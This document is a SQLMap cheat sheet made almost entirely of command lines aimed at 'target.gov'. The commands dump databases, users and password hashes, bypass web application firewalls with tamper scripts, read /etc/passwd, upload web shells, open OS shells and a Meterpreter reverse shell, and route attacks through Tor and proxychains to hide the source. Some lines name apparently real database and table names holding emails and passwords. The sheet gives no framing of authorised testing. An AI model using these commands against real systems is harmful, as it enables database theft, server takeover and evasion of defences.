
SQL Map Cheat Sheet


SQLmap Special Command

Do you want to master database penetration testing techniques more effectively? SQLMap is a widely used tool in information security for detecting and exploiting SQL injection flaws in web applications backed by a database. With this SQLMap cheat sheet, you can speed up the process of identifying and exploiting the SQL injection vulnerabilities that are common across many types of databases.

BASIC COMMAND SQLMAP

- sqlmap -u "target.gov" --dbs --batch
- sqlmap -u "target.gov" -D ( name database ) --columns --batch
- sqlmap -u "target.gov" -D ( name database ) -T ( name table ) --columns --batch
- sqlmap -u "target.gov" -D ( name database ) -T ( name table ) -C ( name column ) --dump --batch

WAF BYPASS TYPE

all bypass waf forbidden

- sqlmap -u "target.gov" --level 5 --dbs --random-agent -v 3

waf bypass using tamper script

- sqlmap -u "target.gov" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs --batch
- sqlmap -u "target.gov" --identify-waf --random-agent -v 3 --dbs --batch
- sqlmap -u "target.gov" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs --batch
- sqlmap -u "target.gov/login" --data="userid=admin&passwd=admin" --method POST --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs --batch
- sqlmap -u "target.gov" --level=5 --skip-waf --dbs --batch
- sqlmap -u "target.gov" --level=5 --risk=3 --random-agent --user-agent -v3 --batch --threads=10 --dbs
- sqlmap -u "target.gov" --dbms="MySQL" -v3 --technique U --tamper="space2mysqlblank.py" --dbs --batch
- sqlmap -u "target.gov" --dbms="MySQL" -v3 --technique U --tamper="space2comment" --dbs --batch
- sqlmap -u "target.gov" -v3 --technique=T --no-cast --fresh-queries --banner --dbs --batch
- sqlmap -u "target.gov" --level 2 --risk 3 --batch --dbs
- sqlmap -u "target.gov" -f -b --current-user --current-db --is-dba --users --dbs --batch
- sqlmap -u "target.gov" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs --batch
- sqlmap -u "target.gov" --risk 3 --level 5 --random-agent --proxy http://127.0.0.1:5980 --dbs --batch
- sqlmap -u "target.gov" --random-agent --dbms=MYSQL --dbs --technique=B" --batch
- sqlmap -u "target.gov" --identify-waf --random-agent -v 3 --dbs --batch
- sqlmap -u "target.gov" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs --batch
- sqlmap -u "target.gov" --parse-errors -v 3 --current-user --is-dba --banner -D eeaco_gm -T #__tabulizer_user_preferences --column --random-agent --level=5 --risk=3 --batch
- sqlmap -u "target.gov" --threads=10 --dbms=MYSQL --tamper=apostrophemask --technique=E -D joomlab -T anz91_session -C session_id --dump --batch
- sqlmap -u "target.gov" --tables -D miss_db --is-dba --threads="10" --time-sec=10 --timeout=5 --no-cast --
tamper=between,modsecurityversioned,modsecurityzeroversioned,charencode,greatest --identify-waf --random-agent --batch
- sqlmap -u "target.gov" -v 3 --dbms "MySQL" --technique U -p id --batch --tamper "space2morehash.py"
- sqlmap -u "target.gov" --banner --safe-url=2 --safe-freq=3 --tamper=between,randomcase,charencode -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2 --batch
- sqlmap -u "target.gov" -v3 --dbms="MySQL" --risk=3 --level=3 --technique=BU --tamper="space2mysqlblank.py" --random-agent -D damksa_abr -T admin,jobadmin,member --columns --batch
- sqlmap -u "target.gov" --level=5 --risk=3 --random-agent --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql --batch
- sqlmap -u "target.gov" --level 5 --risk 3 tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor --dbms=mssql --batch
- sqlmap -u "target.gov" --level 5 --risk 3 tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql -batch
- sqlmap -u "target.gov" --level 5 --risk 3 tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql --batch
- sqlmap -u "target.gov" --level=5 --risk=3 -p "id" –-tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords" --batch
- sqlmap -u "target.gov:80/search.cmd?form_state=1" –level=5 –risk=3 -p ‘item1’ –tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords --batch
-sqlmap -u "target.gov" --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent --batch
- sqlmap -u "target.gov" --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" --tables --batch
- sqlmap -u "target.gov" --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" --columns --batch
- sqlmap -u "target.gov" --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" -C "ud,email,usuario,contra" --dump --batch
- sqlmap -u "target.gov" tamper=between.py,charencode.py,charunicodeencode.py,equaltolike.py,greatest.py,multiplespaces.py,nonrecursivereplacement.py,percentage.py,randomcase.py,securesphere.py,sp_password.py,space2comment.py,space2dash.py,space2mssqlblank.py,space2mysqldash.py,space2plus.py,space2randomblank.py,unionalltounion.py,unmagicquotes.py --dbms=mssql --batcH

bypass 403 forbidden

- sqlmap -u "target.gov" -v3 --dbms="MySql" --risk=3 --level=3 --technique=BU --tamper="space2mysqlblank.py" --random-agent --batch --dbs --no-cast --batch

bypass 403 Not Acceptable

- sqlmap -u "target.gov" --level 5 --dbs --random-agent -v 3 --batch

bypass 500 internal server error

- sqlmap -u "target.gov" --dbs --tamper=modsecurityzeroversioned -v 3 --batch

bypass waf dump table 500 internal server error

- sqlmap -u "target.gov" --dbs --tamper=modsecurityzeroversioned,multiplespaces.py -v 3 --batch

bypass waf Mod Security

- sqlmap -u "target.gov" --random-agent --tamper=modsecurityversioned --level=3 --risk=3 -v 3 --dbs --batcH

SPECIAL COMMAND

upload on header PUT

- sqlmap --method=PUT -u "target.gov" --headers="referer:*" --batch

retrieve information

- sqlmap -u "target.gov" --users --passwords --privileges --roles --threads=10 --batch

Referer header

- sqlmap -u "target.gov" --headers="referer:*" --batch

header injection to combination sql

- sqlmap -u "target.gov" --headers="x-forwarded-for:127.0.0.1*" --batch

injection in header and other HTTP method

> inside cookie
- sqlmap -u "target.gov" --cookie "mycookies=*" --batch
> inside some HEADER
- sqlmap -u "target.gov" --headers="x-forwarded-for:127.0.0.1*" --batch
- sqlmap -u "target.gov" --headers="referer:*" --batch
> PUT method
- sqlmap --method=PUT -u "target.gov" --headers="referer:*" --batch

Verbose

- sqlmap -u "target.gov" -v 3 --batch

specify the string shown when the injected condition evaluates to TRUE

- sqlmap -u "target.gov" --string="string_showed_when_TRUE"

scanning form

- sqlmap -u "target.gov" -u "target.gov/admin/login.php" --form --dbs --batch

force ssl/https

- sqlmap -r a.req --force-ssl --users --batch

specify a parameter in a saved request file

- sqlmap -r login.req -p Password --dbms=mssql -v 3 --batch --level 5 --risk 3 --batch

customizing injection

> set a suffix injection
- sqlmap -u "target.gov/?id=1" -p id --suffix="-- " --batch
> set a prefix injection
- sqlmap -u "target.gov/?id=1" -p id --prefix="') " --batch

second order injection

- sqlmap -r /tmp/r.txt --dbms MySQL --second-order "target.gov" -v 3 --batch
- sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs --batch
- sqlmap -r /root/Desktop/Burp.txt –second -order “target.gov” --batch

running query sql

- sqlmap -u nz3666ghost.to/cat.php?id=2 –sql-shell --batch

scanning a page behind HTTP authentication ( Basic, NTLM, Digest )

- sqlmap -u http://example.com/admin.aspx --auth-type Basic --auth-cred "admin:admin" --batch

scanning a page that uses key-based ( certificate ) authentication

- sqlmap -u http://example.com/admin.aspx --auth-file=<PEM certificate or private key file> --batch

route traffic through the Tor anonymity network

- sqlmap -u "target.gov/admin.aspx" –tor --batch
> set port tor
- sqlmap -u "target.gov/admin/aspx" –tor-port = <tor proxy port> --batch

delay between HTTP requests

- sqlmap -u "target.gov/admin.aspx" --delay=1 --batch  # wait 1 second between requests

pages protected by a CSRF ( Cross-Site Request Forgery ) token

- sqlmap -u "target.gov/admin.aspx" --csrf-token=<name of the parameter that holds the anti-CSRF token> --batch

finding boolean injection

- sqlmap -r r.txt -p id --not-string ridiculous --batch

request injection

- sqlmap -u "target.gov/test.php?id=1" -p id --batch
- sqlmap -u "target.gov/test.php?id=1" * --batch

injection from file

- sqlmap -r request.txt --batch

testing with URL patterns

- sqlmap -u "target.gov/page/*/view" --dbs --batch

using cookies

- sqlmap -u "target.gov/enter.php" --cookie="" -u "target.gov/index.php?id=1" --dbs --batch

identify current database

- sqlmap -u "target.gov/page.php?id=1" --current-db --batch

multi threading

- sqlmap -u "target.gov/page.php?id=1" --dbs --threads 5 --batch

null connection

- sqlmap -u "target.gov/page.php?id=1" --dbs --null-connection --batch

HTTP persistent connection

- sqlmap -u "target.gov/page.php?id=1" --dbs --keep-alive --batch

output prediction

- sqlmap -u "target.gov/page.php?id=1" -D database -T user -c users,password --dump --predict-output --batch

checking privileges

- sqlmap -u "target.gov/page.php?id=1" --privileges --batch

reading file from server

- sqlmap -u "target.gov/page.php?id=1" --file-read=/etc/passwd --batch

using a proxy

- sqlmap --proxy="127.0.0.1:8080" -u "target.gov/page.php?id=1" --dbs --batch

using a proxy with credentials

- sqlmap --proxy="127.0.0.1:8080" --proxy-cred=username:password -u "target.gov/page.php?id=1" --batch

CRAWLING INJECTION

- sqlmap -u "target.gov" --crawl=1 --forms --dbs --batch
- sqlmap -u "target.gov" --crawal=10 --forms --dbs --batch
- sqlmap -u "target.gov" --crawl=2 --forms --dbs --batch
- sqlmap --threads 10 --batch --crawl 1 --forms -u "target.gov" --tamper space2comment --dbs --batch
- sqlmap -u "target.gov" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
- sqlmap -u "target.gov" –crawl = 3 –cookie = "" –crawl-exclude = "logout" --batch
- sqlmap -u "target.gov" --dbms=mysql --crawl=3 --batch
- sqlmap -u "<targetip>" --forms --batch --crawl=10 --cookie=jsessionid=54321 --level 4 --risk 3 --batch
- sqlmap -u "target.gov" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

SQL POST DATA

- sqlmap -u "target.gov" --data="email=omest&password=omest" --method POST --dbs --batch

PARAMETER INJECTION

- sqlmap -u "target.gov" --banner --dbs --batch

BURPSUITE/SANDROPROXY > SQLMAP

> POST request
- sqlmap -r target.txt -p username --batch
- sqlmap -r target.txt -p username --dump --batch
> capture request and create req.txt file
- sqlmap -r req.txt --current-user --batch
> GET request injection
- sqlmap -u "target.gov" -p id --batch
- sqlmap -u "http://example.com/?id=*" -p id --batch
> POST request injection
- sqlmap -u "target.gov" --data "username=*&password=*" --dbs --batch

SQLMAP OS SHELL

> basic operating system shell ( Linux )
- sqlmap -u "target.gov/leet.php?id=1337" --os-shell --batch
> basic operating system command prompt ( Windows )
- sqlmap -u "target.gov/leet.php?id=1337" --os-cmd ( command windows ) --batch
> simple shell
- sqlmap -u "target.gov/?id=1" -p id --os-shell --batch
> exec command os windows
- sqlmap -u "target.gov/?id=1" -p id --os-cmd whoami
> dropping reverse shell ( meterpreter )
- sqlmap -u "target.gov/?id=1" -p id --os-pwn --batch
--file-read=/etc/passwd ( read file )
> os uploading shell
- sqlmap -u "target.gov/page.php?id=1" --file-write=path/shell.php --file-dest=path/shell.php --batch
> os write commad
- sqlmap -u "target.gov/page.php?id=1" --os-shell --batch
after successfully get OS shell
write some file, example
echo "leet" >> haxor.txt
> os shell cookies injection and skipping waf
- sqlmap -u "target.gov/pussy.php?cat=123" --threads=10 --cookie="cookies" --skip-waf --os-shell --batch

SQLMAP WITH PROXYCHAINS ( TOR )

> update and upgrade
- sudo apt-get update;sudo apt-get upgrade
> install proxychains & tor
- sudo apt-get purge proxychains;sudo apt-get purge proxychains4;sudo apt-get purge tor
- sudo apt-get install proxychains4;sudo apt-get install proxychains;sudo apt-get install tor
- which proxychains;which proxychains4;which tor
> setting configuration proxychains using text editor terminal like nano,vim,micro and etc
- nano /etc/proxychains.conf
# WARNING !
# listen
# delete hastag coment ( # ) in dynamic_chain, and add hastag coment ( # ) in strict_chain one more and delete hastag coment ( # ) in random_chain
add socks5 below socks4
# example
socks4 127.0.0.1 9050
socks5 127.0.0.1 9050 ( here add new socks with socks5 like this )
# fix line in hastag coment # proxylist format, example you just space line so that it is parallel
# and then save file configuration
- start tor with command sudo service tor start
- check status tor active with command sudo service tor status
# and last run sqlmap tool with proxychains
yp@syntax:~# proxychains sqlmap -u "target.gov" --dbs --batch